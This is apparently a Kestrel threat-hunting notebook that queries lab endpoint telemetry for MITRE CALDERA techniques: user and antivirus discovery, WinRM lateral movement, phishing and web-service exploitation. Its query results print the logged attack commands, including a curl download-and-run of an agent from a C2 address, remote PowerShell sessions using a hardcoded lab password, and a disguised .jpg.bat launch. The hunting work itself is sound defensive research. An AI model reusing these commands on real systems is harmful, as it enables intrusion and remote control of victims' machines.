## Known Facts

- `192.168.56.111`
    - Windows 10
    - Employee's laptop
    - Company email client: `WinMail.exe`
    - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) -> [Elasticsearch](https://www.elastic.co/) in the cloud
        - Entire data is accessible through [stix-shifter](https://github.com/opencybersecurityalliance/stix-shifter)
        - Partial data dumped for this demo
        - stix-shifter data source name in this hunt: `bh22-windows-192.168.56.111`
- `192.168.56.112`
    - Windows 10
    - Developer's desktop
    - Windows Remote Desktop and Remote Management enabled
    - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) -> [Elasticsearch](https://www.elastic.co/) in the cloud
        - stix-shifter data source name in this hunt: `bh22-windows-192.168.56.112`
- `192.168.56.91`
    - Linux 5.10 server with containers running
    - Enterprise's internal web service (`NodeJS`)
    - [Sysflow](https://github.com/sysflow-telemetry) -> [Elasticsearch](https://www.elastic.co/) in the cloud
        - stix-shifter data source name in this hunt: `bh22-linux-192.168.56.91`

## Where to Start?

How about TTPs specified in [MITRE](https://www.mitre.org/) [CALDERA](https://caldera.mitre.org/)?

![CALDERA T1057](images/caldera_overview_n_T1057.png)

In [1]:
# TTP: Find user processes (T1057)

t1057_instances = GET process
                  FROM stixshifter://bh22-windows-192.168.56.111
                  WHERE [process:name = 'powershell.exe' AND process:command_line LIKE '%getowner%get-process%']
                  START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                     
DISP t1057_instances ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 2012 
 powershell.exe 
 None 
 
 
 2012 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "\$owners = @{};gwmi win32_process |%% {\$owners[\$_.handle] = \$_.getowner().user};\$ps = get-process | select processname,Id,@{l=\"Owner\";e={\$owners[\$_.id.tostring()]}};foreach(\$p in \$ps) { if(\$p.Owner -eq \"user\") { \$p; }}" 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 process* 
 user-account* 
 x-ecs-process* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 t1057_instances 
 process 
 2 
 3 
 9 
 9 
 5 
 5 
 5 
 7 
 5 
 9 
 9 
 9 
 9 
 
 
 *Number of related records cached.

In [2]:
# More?

# TTP: Identify local users (T1087.001)
# CALDERA command on Windows: `Get-WmiObject -Class Win32_UserAccount`
t1087_instances = GET process
                  FROM stixshifter://bh22-windows-192.168.56.111
                  WHERE [process:command_line LIKE '%Win32_UserAccount%']
                  START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                     
DISP t1087_instances ATTR pid, name, command_line

# TTP: Discover antivirus programs (T1518.001)
# CALDERA command on Windows: `wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value`
t1518_instances = GET process
                  FROM stixshifter://bh22-windows-192.168.56.111
                  WHERE [process:command_line LIKE '%AntiVirusProduct%']
                  START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                     
DISP t1518_instances ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 2356 
 powershell.exe 
 None 
 
 
 2356 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "Get-WmiObject -Class Win32_UserAccount" 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 5380 
 WMIC.exe 
 None 
 
 
 5380 
 WMIC.exe 
 "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 
 
 
 6300 
 powershell.exe 
 None 
 
 
 6300 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value" 
 
 
 7204 
 powershell.exe 
 None 
 
 
 7204 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "\$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\$SecurityCenter = \$NameSpace | Select-Object -First 1;Get-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;" 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 process* 
 user-account* 
 x-ecs-process* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 t1087_instances 
 process 
 2 
 3 
 13 
 14 
 9 
 9 
 9 
 13 
 9 
 13 
 13 
 13 
 13 
 
 
 t1518_instances 
 process 
 7 
 14 
 56 
 56 
 36 
 36 
 36 
 54 
 36 
 50 
 50 
 50 
 50 
 
 
 *Number of related records cached.

## This is Too Easy
Can we be a little generic to match multiple related/similar TTPs?

![CALDERA T1057](images/caldera_lateral_movement_TTPs.png)

In [3]:
# TTP: Copy 54ndc47 (WinRM and SCP) (T1570)
# TTP: Start Agent (WinRM) (T1021.006)

lateral_movement = GET process
                   FROM stixshifter://bh22-windows-192.168.56.111
                   WHERE [process:command_line LIKE '%New-PSSession%']
                   START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                  
DISP lateral_movement ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 6816 
 powershell.exe 
 None 
 
 
 6816 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "\$job = Start-Job -ScriptBlock { \$username = \"user\"; \$password = \"redlab\"; \$secstr = New-Object -TypeName System.Security.SecureString; \$password.ToCharArray() | ForEach-Object {\$secstr.AppendChar(\$_)}; \$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist \$username, \$secstr; \$session = New-PSSession -ComputerName \"192.168.56.112\" -Credential \$cred; \$location = \"C:\Users\Public\splunkd.exe\"; Copy-Item \$location -Destination \"C:\Users\Public\splunkd.exe\" -ToSession \$session; Start-Sleep -s 5; Remove-PSSession -Session \$session;};Receive-Job -Job \$job -Wait;" 
 
 
 7028 
 powershell.exe 
 None 
 
 
 7028 
 powershell.exe 
 powershell.exe -ExecutionPolicy Bypass -C "\$username = \"user\";\$password = \"redlab\";\$secstr = New-Object -TypeName System.Security.SecureString;\$password.ToCharArray() | ForEach-Object {\$secstr.AppendChar(\$_)};\$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist \$username, \$secstr;\$session = New-PSSession -ComputerName 192.168.56.112 -Credential \$cred;Invoke-Command -Session \$session -ScriptBlock{cmd.exe /c start C:\Users\Public\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;" 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_movement 
 process 
 8 
 11 
 29 
 30 
 24 
 21 
 21 
 3 
 27 
 21 
 3 
 3 
 33 
 3 
 33 
 33 
 33 
 
 
 *Number of related records cached.

## Even More Generic, Not Limited to a Command?

How about finding TTPs that an email client spawns a shell or a web server spawns a Python interpreter?

**Naturally, TTPs at any complexity could be described as graph patterns, pointed out in paper [Threat Intelligence Computing](https://dl.acm.org/doi/10.1145/3243734.3243829), e.g.**

<img src="images/spawn_TTP.png" align="left" width="194">

In [4]:
# TTP: a process spawns a process invoking another binary/image

# example 1 on Windows: reading email results in executing something
phishing_candidates = GET process
                      FROM stixshifter://bh22-windows-192.168.56.111
                      WHERE [process:parent_ref.name = 'WinMail.exe' AND process:binary_ref.name != 'WinMail.exe']
                      START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'

DISP phishing_candidates ATTR pid, name, command_line

# example 2 on Linux: a web service is exploited to spawns a malicious payload
exploit_candidates = GET process
                     FROM stixshifter://bh22-linux-192.168.56.91
                     WHERE [process:parent_ref.name = 'node' AND process:binary_ref.name != 'node']
                     START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'

DISP exploit_candidates ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 7220 
 cmd.exe 
 None 
 
 
 7220 
 cmd.exe 
 C:\Windows\system32\cmd.exe /c ""C:\Users\Alice\AppData\Local\Temp\return to office schedule.jpg.bat"" 
 
 
 6492 
 iexplore.exe 
 None 
 
 
 6492 
 iexplore.exe 
 "C:\Program Files\Internet Explorer\iexplore.exe" http://www.ibm.com/ 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 13975 
 node 
 /usr/local/bin/node app.js 
 
 
 13975 
 sh 
 /bin/sh -c curl -s -X POST -H "file:sandcat.go" -H "platform:linux" http://192.168.56.150:8888/file/download > splunkd;chmod +x splunkd;./splunkd -server http://192.168.56.150:8888 -group red -v 
 
 
 13975 
 splunkd 
 /usr/local/src/starx/splunkd -server http://192.168.56.150:8888 -group red -v 
 
 
 
 Block Executed in 3 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-file* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 phishing_candidates 
 process 
 13 
 22 
 95 
 95 
 64 
 61 
 61 
 3 
 90 
 61 
 0 
 0 
 3 
 82 
 3 
 82 
 82 
 82 
 
 
 exploit_candidates 
 process 
 882 
 882 
 1702 
 1708 
 1602 
 0 
 0 
 372 
 1938 
 882 
 740 
 22 
 740 
 1410 
 740 
 1410 
 1410 
 1410 
 
 
 *Number of related records cached.

## What if The Command Line Is Obfuscated?

- If the obfuscation is simple, data source query (e.g., Splunk, Elasticsearch, QRadar) may support regular expression (Regex) to help.
- If the obfuscation is complex, and the data source query language cannot de-obfuscate such entity attributes, Kestrel has a Turing-complete foreign function interface (FFI) to help. This is called [Kestrel analytics](https://kestrel.readthedocs.io/en/stable/language.html#apply), which we will show in the third huntbook.